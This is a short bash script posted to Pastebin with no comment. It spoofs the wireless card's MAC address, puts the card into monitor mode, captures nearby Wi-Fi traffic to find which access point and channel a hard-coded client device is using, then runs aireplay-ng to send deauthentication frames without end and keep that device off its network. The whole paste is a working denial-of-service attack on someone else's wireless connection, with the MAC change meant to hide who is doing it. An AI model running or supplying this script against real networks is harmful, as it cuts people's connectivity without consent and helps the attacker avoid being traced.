Advertisement
Guest User

Untitled

a guest
Jun 27th, 2017
54
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.61 KB | None | 0 0
  1. pc=00:22:5F:0D:31:03
  2. if ifconfig -a | grep wlan1 > /dev/null ; then
  3. int=wlan1
  4. else
  5. int=wlan0
  6. fi
  7. ifconfig $int down
  8. macchanger -r $int > /dev/null
  9. ifconfig $int up
  10. rm -R DeAuth*
  11. if airmon-ng | grep mon0 > /dev/null ; then
  12. echo Found mon0
  13. else
  14. airmon-ng start $int > /dev/null
  15. fi
  16. airodump-ng --write DeAuth mon0
  17. mac=$(cat DeAuth-01.csv | tail -50 | grep $pc | cut -d, -f6)
  18. channel=$(cat DeAuth-01.csv | tail -50 | grep $mac | cut -d, -f4 | head -1)
  19. echo $channel $mac $int $pc >> a.txt
  20. iwconfig $int channel $channel
  21. aireplay-ng --deauth 0 -a $mac -c $pc mon0
  22. airmon-ng stop mon0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement